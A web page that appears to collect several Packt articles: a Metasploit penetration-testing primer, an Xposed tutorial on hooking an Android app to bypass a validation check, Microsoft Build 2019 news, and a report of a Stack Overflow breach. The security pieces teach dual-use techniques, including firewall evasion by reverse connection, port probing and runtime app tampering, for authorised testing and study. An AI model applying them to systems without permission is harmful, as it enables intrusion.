How-To Tutorials - Security

Approaching a Penetration Test Using Metasploit

Packt
26 Sep 2016
17 min read
"In God I trust, all others I pen-test" - Binoj Koshy, cyber security expert

In this article by Nipun Jaswal, author of Mastering Metasploit, Second Edition, we will discuss penetration testing: an intentional attack on a computer-based system with the intention of finding vulnerabilities, figuring out security weaknesses, certifying that a system is secure, and gaining access to the system by exploiting these vulnerabilities. A penetration test will tell an organization whether it is vulnerable to an attack, whether the implemented security is enough to oppose any attack, which security controls can be bypassed, and so on. Hence, a penetration test focuses on improving the security of an organization. (For more resources related to this topic, see here.)

Achieving success in a penetration test largely depends on using the right set of tools and techniques. A penetration tester must choose the right set of tools and methodologies in order to complete a test. While talking about the best tools for penetration testing, the first one that comes to mind is Metasploit. It is considered one of the most effective auditing tools for carrying out penetration testing today. Metasploit offers a wide variety of exploits, an extensive exploit development environment, information gathering and web testing capabilities, and much more.

This article covers not only the frontend perspectives of Metasploit but also the development and customization of the framework. It assumes that the reader has basic knowledge of the Metasploit framework; however, some sections will help you recall the basics as well. While covering Metasploit from the very basics to the elite level, we will stick to a step-by-step approach, as shown in the following diagram: This article will help you recall the basics of penetration testing and Metasploit, which will help you warm up to the pace of this article.
In this article, you will learn about the following topics:

The phases of a penetration test
The basics of the Metasploit framework
The workings of exploits
Testing a target network with Metasploit
The benefits of using databases

An important point to note here is that one does not become an expert penetration tester in a single day. It takes practice, familiarization with the work environment, the ability to perform in critical situations, and most importantly, an understanding of how to cycle through the various stages of a penetration test.

When we think about conducting a penetration test on an organization, we need to make sure that everything is set perfectly and is in accordance with a penetration test standard. Therefore, if you feel you are new to penetration testing standards or uncomfortable with the term Penetration Testing Execution Standard (PTES), please refer to http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines to become more familiar with penetration testing and vulnerability assessments. According to PTES, the following diagram explains the various phases of a penetration test: Refer to the http://www.pentest-standard.org website to set up the hardware and the systematic phases to be followed in a work environment; these setups are required to perform a professional penetration test.

Organizing a penetration test

Before we start firing sophisticated and complex attack vectors with Metasploit, we must get comfortable with the work environment. Gathering knowledge about the work environment is a critical factor that comes into play before conducting a penetration test. Let us understand the various phases of a penetration test before jumping into Metasploit exercises and see how to organize a penetration test on a professional scale.
Preinteractions

The very first phase of a penetration test, preinteractions, involves a discussion with the client of the critical factors regarding the conduct of a penetration test on the client's organization, company, institute, or network. It serves as the connecting line between the penetration tester and the client. Preinteractions help the client gain enough knowledge about what is about to be done over his or her network, domain, or server; the tester therefore also serves as an educator to the client. The penetration tester also discusses the scope of the test, all the domains that will be tested, and any special requirements that will be needed while conducting the test on the client's behalf. This includes special privileges, access to critical systems, and so on. The expected positives of the test should also be part of the discussion with the client in this phase. As a process, preinteractions cover some of the following key points:

Scope: This section discusses the scope of the project and estimates its size. Scope also defines what to include for testing and what to exclude from the test. The tester also discusses the ranges and domains under the scope and the type of test (black box or white box) to be performed. For white box testing, what access options does the tester require? Questionnaires for administrators, the time duration of the test, whether to include stress testing or not, and payment terms and conditions are included in the scope. A general scope document provides answers to the following questions:

What are the target organization's biggest security concerns?
What specific hosts, network address ranges, or applications should be tested?
What specific hosts, network address ranges, or applications should explicitly NOT be tested?
Are there any third parties that own systems or networks that are in scope, and which systems do they own (written permission must have been obtained in advance by the target organization)?
Will the test be performed against a live production environment or a test environment?
Will the penetration test include the following testing techniques: ping sweep of network ranges, port scan of target hosts, vulnerability scan of targets, penetration of targets, application-level manipulation, client-side Java/ActiveX reverse engineering, physical penetration attempts, and social engineering?
Will the penetration test include internal network testing? If so, how will access be obtained?
Are client/end-user systems included in the scope? If so, how many clients will be leveraged?
Is social engineering allowed? If so, how may it be used?
Are Denial of Service attacks allowed?
Are dangerous checks/exploits allowed?

Goals: This section discusses the various primary and secondary goals that the penetration test is set to achieve. The common questions related to the goals are as follows:

What is the business requirement for this penetration test? Is it required by a regulatory audit or standard, or is it a proactive internal decision to determine all weaknesses?
What are the objectives? To map out vulnerabilities, demonstrate that the vulnerabilities exist, test the incident response, actually exploit a vulnerability in a network, system, or application, or all of the above?

Testing terms and definitions: This section discusses basic terminology with the client and helps him or her understand the terms well.

Rules of engagement: This section defines the time of testing, the timeline, permissions to attack, and regular meetings to update the status of the ongoing test. The common questions related to the rules of engagement are as follows:

At what time do you want these tests to be performed?
During business hours, after business hours, during weekend hours, or during a system maintenance window?
Will this testing be done on a production environment? If production environments should not be affected, does a similar environment (development and/or test systems) exist that can be used to conduct the penetration test?
Who is the technical point of contact?

For more information on preinteractions, refer to http://www.pentest-standard.org/index.php/File:Pre-engagement.png.

Intelligence gathering / reconnaissance phase

In the intelligence-gathering phase, you need to gather as much information as possible about the target network. The target network could be a website or an organization, or it might be a full-fledged Fortune 500 company. The most important aspect is to gather information about the target from social media networks and to use Google Hacking (a way to extract sensitive information from Google using specialized queries) to find sensitive information related to the target. Footprinting the organization using active and passive attacks can also be an approach.

The intelligence phase is one of the most crucial phases in penetration testing. Properly gained knowledge about the target will help the tester to simulate appropriate and exact attacks, rather than trying all possible attack mechanisms; it will also help him or her save a large amount of time. This phase will consume 40 to 60 percent of the total time of the testing, as gaining access to the target depends largely upon how well the system is footprinted. It is the duty of a penetration tester to gain adequate knowledge about the target by conducting a variety of scans, looking for open ports, identifying all the services running on those ports, and deciding which services are vulnerable and how to make use of them to enter the desired system.
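As a minimal illustration of the port-checking step mentioned above, the following plain-Java sketch attempts a TCP connection with a timeout to decide whether a port is open. This is a hypothetical helper written for this article's discussion, not a Metasploit module; on a real engagement you would use a dedicated scanner such as Nmap or Metasploit's auxiliary scanner modules.

```java
import java.net.InetSocketAddress;
import java.net.Socket;

public class PortCheck {
    // Attempt a TCP connection; a completed handshake means the port is open.
    static boolean isOpen(String host, int port, int timeoutMs) {
        try (Socket s = new Socket()) {
            s.connect(new InetSocketAddress(host, port), timeoutMs);
            return true;
        } catch (Exception e) {
            // Refused or timed-out connections are treated as "closed/filtered".
            return false;
        }
    }

    public static void main(String[] args) {
        int port = args.length > 0 ? Integer.parseInt(args[0]) : 80;
        System.out.println("port " + port + " open: " + isOpen("127.0.0.1", port, 500));
    }
}
```

A scanner simply loops this check over a port range and then fingerprints whatever answers, which is the banner-grabbing step described later.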
The procedures followed during this phase are required to identify the security policies that are currently in place at the target, and what we can do to breach them. Let us discuss this using an example.

Consider a black box test against a web server where the client wants a network stress test performed. Here, we will be testing the server to check what level of bandwidth and resource stress it can bear or, in simple terms, how the server responds to a Denial of Service (DoS) attack. A DoS attack or a stress test is the name given to the procedure of sending indefinite requests or data to a server in order to check whether the server is able to handle and respond to all the requests successfully or crashes, causing a DoS. A DoS can also occur if the target service is vulnerable to specially crafted requests or packets.

To achieve this, we start our network stress-testing tool and launch an attack towards the target website. However, a few seconds after launching the attack, we see that the server is not responding to our browser and the website does not open. Additionally, a page shows up saying that the website is currently offline. So what does this mean? Did we successfully take out the web server we wanted? Nope! In reality, it is a sign of a protection mechanism set up by the server administrator that sensed our malicious intent of taking the server down and hence banned our IP address. Therefore, we must collect correct information and identify the various security services at the target before launching an attack.

The better approach is to test the web server from a different IP range. Maybe keeping two to three different virtual private servers for testing is a good approach. In addition, I advise you to test all attack vectors in a virtual environment before launching them at the real targets.
A proper validation of the attack vectors is mandatory because if we do not validate them prior to the attack, they may crash the service at the target, which is not favorable at all. Network stress tests should generally be performed towards the end of the engagement or in a maintenance window. Additionally, it is always helpful to ask the client to whitelist the IP addresses used for testing.

Now let us look at a second example. Consider a black box test against a Windows Server 2012 machine. While scanning the target server, we find that port 80 and port 8080 are open. On port 80, we find the latest version of Internet Information Services (IIS) running, while on port 8080, we discover a vulnerable version of the Rejetto HFS server, which is prone to a remote code execution flaw. However, when we try to exploit this vulnerable version of HFS, the exploit fails. This is a common scenario in which inbound malicious traffic is blocked by a firewall. In this case, we can simply change our approach and connect back from the server, which will establish a connection from the target back to our system rather than us connecting to the server directly. This may prove more successful, as firewalls are commonly configured to inspect ingress traffic rather than egress traffic.

Coming back to the intelligence-gathering phase, the procedures involved, when viewed as a process, are as follows:

Target selection: This involves selecting the targets to attack, identifying the goals of the attack, and the time of the attack.
Covert gathering: This involves on-location gathering, the equipment in use, and dumpster diving. In addition, it covers off-site gathering that involves data warehouse identification; this phase is generally considered during a white box penetration test.
Footprinting: This involves active or passive scans to identify the various technologies used at the target, including port scanning, banner grabbing, and so on.
Identifying protection mechanisms: This involves identifying firewalls, filtering systems, network- and host-based protections, and so on.

For more information on gathering intelligence, refer to http://www.pentest-standard.org/index.php/Intelligence_Gathering.

Predicting the test grounds

A regular occurrence in a penetration tester's life is that when they start testing an environment, they already know what to do next. If they come across a Windows box, they switch their approach towards the exploits that work perfectly for Windows and leave aside the rest of the options. An example of this might be an exploit for the NETAPI vulnerability, which is the most favorable choice for exploiting a Windows XP box. Suppose a penetration tester needs to visit an organization and, before going there, learns that 90 percent of the machines in the organization are running Windows XP and some of them use Windows 2000 Server. The tester quickly decides to use the NETAPI exploit for XP-based systems and the DCOM exploit for Windows 2000 Server from Metasploit to complete the testing phase successfully. We will also see how to use these exploits practically in a later section of this article.

Consider another example of a white box test on a web server where the server is hosting ASP and ASPX pages. In this case, we switch our approach to Windows-based exploits and IIS testing tools, ignoring the exploits and tools for Linux. Hence, predicting the environment under test helps to build the strategy to follow at the client's site.

For more information on the NETAPI vulnerability, visit http://technet.microsoft.com/en-us/security/bulletin/ms08-067.
For more information on the DCOM vulnerability, visit http://www.rapid7.com/db/modules/exploit/windows/dcerpc/ms03_026_dcom.

Modeling threats

In order to conduct a comprehensive penetration test, threat modeling is required. This phase focuses on modeling the correct threats, their effects, and their categorization based on the impact they can cause. Based on the analysis made during the intelligence-gathering phase, we can model the best possible attack vectors. Threat modeling applies to business asset analysis, process analysis, threat analysis, and threat capability analysis. This phase answers the following set of questions:

How can we attack a particular network?
To which crucial sections do we need to gain access?
What approach is best suited for the attack?
What are the highest-rated threats?

Modeling threats will help a penetration tester to perform the following set of operations:

Gather relevant documentation about high-level threats
Identify an organization's assets on a categorical basis
Identify and categorize threats
Map threats to the assets of the organization

Modeling threats will help define the highest-priority assets along with the threats that can influence them. Now, let us discuss a third example. Consider a black box test against a company's website. Here, information about the company's clients is the primary asset. It is also possible that, in a different database on the same backend, transaction records are also stored. In this case, an attacker can use the threat of a SQL injection to step over to the transaction records database; hence, transaction records are the secondary asset. Mapping a SQL injection attack to the primary and secondary assets is achievable during this phase. Vulnerability scanners such as Nexpose and the Pro version of Metasploit can help model threats clearly and quickly using an automated approach, which can prove handy while conducting large tests.
For more information on the processes involved during the threat modeling phase, refer to http://www.pentest-standard.org/index.php/Threat_Modeling.

Vulnerability analysis

Vulnerability analysis is the process of discovering flaws in a system or an application. These flaws can vary from server misconfigurations to web application flaws, from insecure application design to vulnerable database services, and from VoIP-based servers to SCADA-based services. This phase generally contains three different mechanisms: testing, validation, and research. Testing consists of active and passive tests. Validation consists of dropping the false positives and confirming the existence of vulnerabilities through manual validation. Research refers to verifying a vulnerability that is found and triggering it to confirm its existence.

For more information on the processes involved during the vulnerability analysis phase, refer to http://www.pentest-standard.org/index.php/Vulnerability_Analysis.

Exploitation and post-exploitation

The exploitation phase involves taking advantage of the previously discovered vulnerabilities. This phase is considered the actual attack phase: a penetration tester fires up exploits at the target vulnerabilities of a system in order to gain access. This phase is covered heavily throughout the article. The post-exploitation phase is the latter phase of exploitation; it covers the various tasks that we can perform on an exploited system, such as elevating privileges, uploading/downloading files, pivoting, and so on.

For more information on the processes involved during the exploitation phase, refer to http://www.pentest-standard.org/index.php/Exploitation. For more information on post-exploitation, refer to http://www.pentest-standard.org/index.php/Post_Exploitation.

Reporting

Creating a formal report of the entire penetration test is the last phase to conduct while carrying out a penetration test.
Identifying key vulnerabilities, creating charts and graphs, recommendations, and proposed fixes are a vital part of the penetration test report. An entire section dedicated to reporting is covered in the latter half of this article. For more information on the processes involved during the reporting phase, refer to http://www.pentest-standard.org/index.php/Reporting.

Mounting the environment

Before going to war, soldiers make sure that their artillery is working perfectly. This is exactly what we are going to do. Testing an environment successfully depends on how well your test labs are configured. Moreover, a successful test answers the following set of questions:

How well is your test lab configured?
Are all the required tools for testing available?
How good is your hardware at supporting such tools?

Before we begin to test anything, we must make sure that all the required tools are available and that everything works perfectly.

Summary

Throughout this article, we have introduced the phases involved in penetration testing. We have also seen how to set up Metasploit and conduct a black box test on a network. We recalled the basic functionalities of Metasploit as well. We saw how we could perform a penetration test on two different Linux boxes and Windows Server 2012, and we looked at the benefits of using databases in Metasploit. After completing this article, we are equipped with the following:

Knowledge of the phases of a penetration test
The benefits of using databases in Metasploit
The basics of the Metasploit framework
Knowledge of the workings of exploits and auxiliary modules
Knowledge of the approach to penetration testing with Metasploit

The primary goal of this article was to inform you about penetration test phases and Metasploit. Next, we will dive into the coding part of Metasploit and write custom functionalities for the Metasploit framework.
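As a closing aside to the firewall example discussed earlier: the connect-back (reverse connection) idea, where the target dials out to the tester instead of the tester dialing in, can be sketched with plain sockets. This is a hypothetical plain-Java illustration of the traffic direction only, not a Metasploit payload; the class and message names are invented for the demo.

```java
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.net.ServerSocket;
import java.net.Socket;

public class ReverseConnectDemo {
    // The tester listens; the target dials out, since egress traffic is
    // inspected far less often than ingress traffic.
    public static String runDemo() throws Exception {
        try (ServerSocket listener = new ServerSocket(0)) { // tester's handler
            int port = listener.getLocalPort();
            Thread target = new Thread(() -> {
                // Simulated target: it initiates the outbound connection.
                try (Socket out = new Socket("127.0.0.1", port);
                     PrintWriter w = new PrintWriter(out.getOutputStream(), true)) {
                    w.println("connection from target");
                } catch (Exception ignored) {
                }
            });
            target.start();
            try (Socket conn = listener.accept();
                 BufferedReader r = new BufferedReader(
                         new InputStreamReader(conn.getInputStream()))) {
                return r.readLine();
            }
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println(runDemo());
    }
}
```

In Metasploit terms, this direction reversal is the difference between a bind payload (tester connects in) and a reverse payload (target connects out).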
Resources for Article: Further resources on this subject: Introducing Penetration Testing [article] Open Source Intelligence [article] Ruby and Metasploit Modules [article]
Hacking Android Apps Using the Xposed Framework

Packt
13 Jul 2016
6 min read
In this article by Srinivasa Rao Kotipalli and Mohammed A. Imran, authors of Hacking Android, we will discuss Android security, one of the most prominent emerging topics today. Attacks on mobile devices can be categorized into various categories, such as exploiting vulnerabilities in the kernel, attacking vulnerable apps, tricking users into downloading and running malware and thus stealing personal data from the device, and running misconfigured services on the device. OWASP has also released the Mobile Top 10 list, helping the community better understand mobile security as a whole. Although it is hard to cover a lot in a single article, let's look at an interesting topic: the runtime manipulation of Android applications. Runtime manipulation is controlling application flow at runtime. There are multiple tools and techniques out there to perform runtime manipulation on Android. This article discusses using the Xposed framework to hook onto Android apps. (For more resources related to this topic, see here.) Let's begin!

Xposed is a framework that enables developers to write custom modules for hooking onto Android apps and thus modifying their flow at runtime. It was released by rovo89 in 2012. It works by placing an app_process binary in the /system/bin/ directory, replacing the original app_process binary. app_process is the binary responsible for starting the zygote process. Basically, when an Android phone is booted, init runs /system/bin/app_process and gives the resulting process the name Zygote. We can hook onto any process that is forked from the Zygote process using the Xposed framework.

To demonstrate the capabilities of the Xposed framework, I have developed a custom vulnerable application. The package name of the vulnerable app is com.androidpentesting.hackingandroidvulnapp1. The code in the following screenshot shows how the vulnerable application works: This code has a method, setOutput, that is called when the button is clicked.
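Since the vulnerable app's code appears only as a screenshot, here is a minimal plain-Java sketch of the logic described next. The class shape and method signature are assumptions for illustration; only the i == 1 check and the two output strings come from the article.

```java
public class VulnApp {
    // Mirrors the app's validation: only i == 1 yields "Cracked".
    static String setOutput(int i) {
        if (i == 1) {
            return "Cracked";
        }
        return "You cant crack it";
    }

    public static void main(String[] args) {
        int i = 0; // the app initializes i to 0, so the success branch is unreachable
        System.out.println(setOutput(i));
    }
}
```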
When setOutput is called, the value of i is passed to it as an argument. Notice that the value of i is initialized to 0. Inside the setOutput function, there is a check to see whether the value of i is equal to 1. If it is, the application will display the text Cracked; but since the initialized value is 0, this app always displays the text You cant crack it. Running the application in an emulator looks like this:

Now, our goal is to write an Xposed module to modify the functionality of this app at runtime and thus print the text Cracked. First, download and install the Xposed APK file in your emulator. Xposed can be downloaded from the following link: http://dl-xda.xposed.info/modules/de.robv.android.xposed.installer_v32_de4f0d.apk

Install the downloaded APK file using the following command: adb install [file name].apk

Once you've installed this app, launch it, and you should see the following screen: At this stage, make sure that you have everything set up before you proceed. Once you are done with the setup, navigate to the Modules tab, where we can see all the installed Xposed modules. The following figure shows that we currently don't have any modules installed:

We will now create a new module to achieve the goal of printing the text Cracked in the target application shown earlier. We will use Android Studio to develop this custom module. Here is the step-by-step procedure:

The first step is to create a new project in Android Studio by choosing the Add No Activity option, as shown in the following screenshot. I named it XposedModule.
The next step is to add the XposedBridgeAPI library so that we can use Xposed-specific methods within the module. Download the library from the following link: http://forum.xda-developers.com/attachment.php?attachmentid=2748878&d=1400342298
Create a folder called provided within the app directory and place this library inside the provided directory.
Now, create a folder called assets inside the app/src/main/ directory, and create a new file called xposed_init. We will add contents to this file in a later step. After completing the first three steps, our project directory structure should look like this:

Now, open the build.gradle file under the app folder, and add the following line under the dependencies section: provided files('provided/[file name of the Xposed library.jar]') In my case, it looks like this:

Create a new class and name it XposedClass, as shown here: After you're done creating the new class, the project structure should look as shown in the following screenshot:

Now, open the xposed_init file that we created earlier, and place the following content in it: com.androidpentesting.xposedmodule.XposedClass This looks like the following screenshot:

Now, let's provide some information about the module by adding the following content to AndroidManifest.xml: <meta-data android:name="xposedmodule" android:value="true" /> <meta-data android:name="xposeddescription" android:value="xposed module to bypass the validation" /> <meta-data android:name="xposedminversion" android:value="54" /> Make sure that you add this content to the application section as shown here:

Finally, write the actual code within the XposedClass to add a hook.
Here is the piece of code that actually bypasses the validation being done in the target application: Here's what we have done in the previous code:

Firstly, our class implements IXposedHookLoadPackage.
We wrote the implementation for the handleLoadPackage method; this is mandatory when we implement IXposedHookLoadPackage.
We set up the string values for classToHook and functionToHook.
An if condition is written to see whether the package name equals the target package name.
If the package name matches, the custom code provided inside beforeHookedMethod is executed.
Within beforeHookedMethod, we set the value of i to 1; thus, when the button is clicked, the value of i will be considered to be 1, and the text Cracked will be displayed as a toast message.

Compile and run this application just like any other Android app, and then check the Modules section of the Xposed application. You should see a new module with the name XposedModule, as shown here: Select the module and reboot the emulator. Once the emulator has restarted, run the target application and click on the Crack Me button. As you can see in the screenshot, we have modified the application's functionality at runtime without actually modifying its original code. We can also see the logs by tapping on the Logs section. You can observe the XposedBridge.log method in the source code shown previously; this is the method used to log the data shown.

Summary

Xposed is without a doubt one of the best frameworks available out there. Understanding frameworks such as Xposed is essential to understanding Android application security. This article demonstrated the capabilities of the Xposed framework for manipulating apps at runtime. A lot of other interesting things can be done using Xposed, such as bypassing root detection and SSL pinning.
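The core idea behind beforeHookedMethod (intercepting a call and overwriting a method argument before the call proceeds) can be imitated in plain Java with reflection. This is a hedged sketch for illustration only: it does not use the real Xposed API, which requires the XposedBridge library and a rooted device, and the Target class here is a stand-in for the vulnerable activity.

```java
import java.lang.reflect.Method;

public class HookDemo {
    static class Target {
        // Stand-in for the vulnerable app's validation method.
        String setOutput(int i) {
            return (i == 1) ? "Cracked" : "You cant crack it";
        }
    }

    // Analogous to beforeHookedMethod: intercept the call and force the
    // argument to 1, regardless of what the caller passed (originalArg is
    // deliberately ignored, just as the Xposed hook overwrites args[0]).
    static String invokeWithForcedArg(Target t, int originalArg) throws Exception {
        int forced = 1;
        Method m = Target.class.getDeclaredMethod("setOutput", int.class);
        m.setAccessible(true);
        return (String) m.invoke(t, forced);
    }

    public static void main(String[] args) throws Exception {
        // The caller passes 0, but the "hook" rewrites it before dispatch.
        System.out.println(invokeWithForcedArg(new Target(), 0));
    }
}
```

Xposed does this interception inside the app's own process for every call to the hooked method, which is why no change to the APK is needed.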
Further resources on this subject: Speeding up Gradle builds for Android [article] https://www.packtpub.com/books/content/incident-response-and-live-analysis [article] Mobile Forensics [article]
Microsoft Build 2019: Microsoft showcases new updates to MS 365 platform with focus on AI and developer productivity

Sugandha Lahoti
07 May 2019
10 min read
At the ongoing Microsoft Build 2019 conference, Microsoft has announced a ton of new features and tool releases with a focus on innovation using AI and mixed reality with the intelligent cloud and the intelligent edge. In his opening keynote, Microsoft CEO Satya Nadella outlined the company’s vision and developer opportunity across Microsoft Azure, Microsoft Dynamics 365 and IoT Platform, Microsoft 365, and Microsoft Gaming. “As computing becomes embedded in every aspect of our lives, the choices developers make will define the world we live in,” said Satya Nadella, CEO, Microsoft. “Microsoft is committed to providing developers with trusted tools and platforms spanning every layer of the modern technology stack to build magical experiences that create new opportunity for everyone.” https://youtu.be/rIJRFHDr1QE

Increasing developer productivity in the Microsoft 365 platform

Microsoft Graph data connect

The Microsoft Graph is now powered with data connectivity, a service that combines analytics data from the Microsoft Graph with customers’ business data. Microsoft Graph data connect will provide Office 365 data and Microsoft Azure resources to users via a toolset. The migration pipelines are deployed and managed through Azure Data Factory. Microsoft Graph data connect can be used to create new apps shared within enterprises or externally in the Microsoft Azure Marketplace. It is generally available as a feature in Workplace Analytics and also as a standalone SKU for ISVs. More information here.

Microsoft Search

Microsoft Search works as a unified search experience across all Microsoft apps: Office, Outlook, SharePoint, OneDrive, Bing, and Windows. It applies AI technology from Bing and deep personalized insights surfaced by the Microsoft Graph to personalize searches.
Other features included in Microsoft Search are:

Search box displacement
Zero query typing and a key-phrase suggestion feature
A query history feature, including personal search query history
Administrator access to the history of popular searches for their organizations, but not to the search history of individual users
File/people/site/bookmark suggestions

Microsoft Search will begin publicly rolling out to all Microsoft 365 and Office 365 commercial subscriptions worldwide at the end of May. Read more on Microsoft Search here.

Fluid Framework

As the name suggests, Microsoft's newly launched Fluid Framework allows seamless editing and collaboration between different applications. Essentially, it is a web-based platform and componentized document model that allows users to, for example, edit a document in an application like Word and then share a table from that document in Microsoft Teams (or even a third-party application) with real-time syncing. Microsoft says Fluid can translate text, fetch content, suggest edits, perform compliance checks, and more. The company will launch the software development kit and the first experiences powered by the Fluid Framework later this year in Microsoft Word, Teams, and Outlook. Read more about the Fluid Framework here.

Microsoft Edge new features

Microsoft Build 2019 paved the way for a bundle of new features for Microsoft's flagship web browser, Microsoft Edge. The new features include:

Internet Explorer mode: This mode integrates Internet Explorer directly into the new Microsoft Edge via a new tab, allowing businesses to run legacy Internet Explorer-based apps in a modern browser.
Privacy tools: Additional privacy controls that allow customers to choose from three levels of privacy in Microsoft Edge: Unrestricted, Balanced, and Strict. These options limit the ability of third parties to track users across the web. "Unrestricted" allows all third-party trackers to work in the browser. "Balanced" prevents third-party trackers from sites the user has not visited before.
And “Strict” blocks all third-party trackers.

Collections: Collections allows users to collect, organize, share and export content more efficiently and with Office integration.

Microsoft is also migrating Edge as a whole over to Chromium. This will make Edge easier for third parties to develop for. For more details, visit Microsoft’s developer blog.

New toolkit enhancements in the Microsoft 365 Platform

Windows Terminal

Windows Terminal is Microsoft’s new application for Windows command-line users. Top features include:

- User interface with emoji-rich fonts and graphics-processing-unit-accelerated text rendering
- Multiple tab support and theming and customization features
- Powerful command-line user experience for users of PowerShell, Cmd, Windows Subsystem for Linux (WSL) and all forms of command-line application

Windows Terminal will arrive in mid-June and will be delivered via the Microsoft Store in Windows 10. Read more here.

React Native for Windows

Microsoft announced a new open-source project for React Native developers at Microsoft Build 2019. Developers who prefer to use the React/web ecosystem to write user-experience components can now leverage those skills and components on Windows by using the “React Native for Windows” implementation. React Native for Windows is under the MIT License and will allow developers to target any Windows 10 device, including PCs, tablets, Xbox, mixed reality devices and more. The project is being developed on GitHub and is available for developers to test. More mature releases will follow soon.

Windows Subsystem for Linux 2

Microsoft rolled out a new architecture for the Windows Subsystem for Linux, WSL 2, at MSBuild 2019. Microsoft will also be shipping a fully open-source Linux kernel with Windows, specially tuned for WSL 2. New features include massive file system performance increases (twice as much speed for file-system-heavy operations, such as Node Package Manager install). WSL 2 also supports running Linux Docker containers.
The next generation of WSL arrives for Insiders in mid-June. More information here.

New releases in multiple Developer Tools

.NET 5 arrives in 2020

.NET 5 is the next major version of the .NET Platform, which will be available in 2020. .NET 5 will have all .NET Core features as well as more additions:

- One Base Class Library containing APIs for building any type of application
- More choice on runtime experiences
- Java interoperability will be available on all platforms
- Objective-C and Swift interoperability will be supported on multiple operating systems

.NET 5 will provide both Just-in-Time (JIT) and Ahead-of-Time (AOT) compilation models to support multiple compute and device scenarios. .NET 5 also will offer one unified toolchain supported by new SDK project types as well as a flexible deployment model (side-by-side and self-contained EXEs). Detailed information here.

ML.NET 1.0

ML.NET is Microsoft’s open-source and cross-platform framework that runs on Windows, Linux, and macOS and makes machine learning accessible for .NET developers. Its new version, ML.NET 1.0, was released at the Microsoft Build Conference 2019 yesterday. Some new features in this release are:

- Automated Machine Learning Preview: Automatically transforms input data and selects the best performing ML algorithm with the right settings. AutoML support in ML.NET is in preview and currently supports Regression and Classification ML tasks.
- ML.NET Model Builder Preview: Model Builder is a simple UI tool for developers which uses AutoML to build ML models. It also generates model training and model consumption code for the best performing model.
- ML.NET CLI Preview: ML.NET CLI is a dotnet tool which generates ML.NET Models using AutoML and ML.NET. The ML.NET CLI quickly iterates through a dataset for a specific ML Task and produces the best model.

Visual Studio IntelliCode, Microsoft’s tool for AI-assisted coding

Visual Studio IntelliCode, Microsoft’s AI-assisted coding tool, is now generally available.
It is essentially an enhanced IntelliSense, Microsoft’s extremely popular code completion tool. IntelliCode is trained using the code of thousands of open-source projects from GitHub that have at least 100 stars. It is available for C# and XAML in Visual Studio and for Java, JavaScript, TypeScript, and Python in Visual Studio Code. IntelliCode is also included by default in Visual Studio 2019, starting in version 16.1 Preview 2. Additional capabilities, such as custom models, remain in public preview.

Visual Studio 2019 version 16.1 Preview 2

The Visual Studio 2019 version 16.1 Preview 2 release includes IntelliCode and the GitHub extensions by default. It also brings out of preview the Time Travel Debugging feature introduced with version 16.0, and includes multiple performance and productivity improvements for .NET and C++ developers.

Gaming and Mixed Reality

Minecraft AR game for mobile devices

At the end of Microsoft’s Build 2019 keynote yesterday, Microsoft teased a new Minecraft game in augmented reality, running on a phone. The teaser notes that more information will be coming on May 17th, the 10-year anniversary of Minecraft.

https://www.youtube.com/watch?v=UiX0dVXiGa8

HoloLens 2 Development Edition and Unreal Engine support

The HoloLens 2 Development Edition includes a HoloLens 2 device, $500 in Azure credits and three-month free trials of Unity Pro and the Unity PiXYZ Plugin for CAD data, starting at $3,500 or as low as $99 per month. The HoloLens 2 Development Edition will be available for preorder soon and will ship later this year. Unreal Engine support for streaming and native platform integration will be available for HoloLens 2 by the end of May.

Intelligent Edge and IoT

Azure IoT Central new features

Microsoft Build 2019 also featured new additions to Azure IoT Central, an IoT software-as-a-service solution.
- Better rules processing and custom rules with services like Azure Functions or Azure Stream Analytics
- Multiple dashboards and data visualization options for different types of users
- Inbound and outbound data connectors, so that operators can integrate with other systems
- Ability to add custom branding and operator resources to an IoT Central application with new white labeling options

New Azure IoT Central features are available for customer trials.

IoT Plug and Play

IoT Plug and Play is a new, open modeling language to connect IoT devices to the cloud seamlessly without developers having to write a single line of embedded code. IoT Plug and Play also enables device manufacturers to build smarter IoT devices that just work with the cloud. Cloud developers will be able to find IoT Plug and Play enabled devices in Microsoft’s Azure IoT Device Catalog. The first device partners include Compal, Kyocera, and STMicroelectronics, among others.

Azure Maps Mobility Service

Azure Maps Mobility Service is a new API which provides real-time public transit information, including nearby stops, routes and trip intelligence. This API will also provide transit services to help with city planning, logistics, and transportation. Azure Maps Mobility Service will be in public preview in June. Read more about Azure Maps Mobility Service here.

KEDA: Kubernetes-based event-driven autoscaling

Microsoft and Red Hat collaborated to create KEDA, an open-sourced project that supports the deployment of serverless, event-driven containers on Kubernetes. It can be used in any Kubernetes environment, in any public/private cloud or on-premises, such as Azure Kubernetes Service (AKS) and Red Hat OpenShift. KEDA has support for built-in triggers to respond to events happening in other services or components. This allows the container to consume events directly from the source, instead of routing through HTTP.
KEDA also presents a new hosting option for Azure Functions that can be deployed as a container in Kubernetes clusters.

Securing elections and political campaigns

ElectionGuard SDK and Microsoft 365 for Campaigns

ElectionGuard is a free, open-source software development kit (SDK) released as an extension of Microsoft’s Defending Democracy Program. It enables end-to-end verifiability and improved risk-limiting audit capabilities for elections in voting systems. Microsoft 365 for Campaigns provides the security capabilities of Microsoft 365 Business to political parties and individual candidates. More details here.

Microsoft Build is in its 6th year and will continue till 8th May. The conference hosts over 6,000 attendees, with nearly 500 student-age developers and over 2,600 customers and partners in attendance. Watch it live here!

Microsoft introduces Remote Development extensions to make remote development easier on VS Code

Docker announces a collaboration with Microsoft’s .NET at DockerCon 2019

How Visual Studio Code can help bridge the gap between full-stack development and DevOps [Sponsored by Microsoft]
Vincy Davis
20 May 2019
4 min read

Approx. 250 public network users affected during Stack Overflow's security attack

In a security update released on May 16, Stack Overflow confirmed that “some level of their production access was gained on May 11”. In a recent “Update to Security Incident” post, Stack Overflow provides further details of the security attack, including the actual date and duration of the attack, how the attack took place, and the company’s response to this incident.

According to the update, the first intrusion happened on May 5, when a build deployed to the development tier for stackoverflow.com contained a bug. This allowed the attacker to log in to the development tier as well as escalate their access to the production version of stackoverflow.com. From May 5 onwards, the intruder took time to explore the website until May 11, after which the intruder made changes to the Stack Overflow system to obtain privileged access on production. This change was identified by the Stack Overflow team and led to immediately revoking the intruder's network-wide access and initiating an investigation into the intrusion.

As part of their security procedure to protect sensitive customer data, Stack Overflow maintains separate infrastructure and networks for their clients of Teams, Business, and Enterprise products. They have not found any evidence of these systems or customer data being accessed. The Advertising and Talent businesses of Stack Overflow were also not impacted.

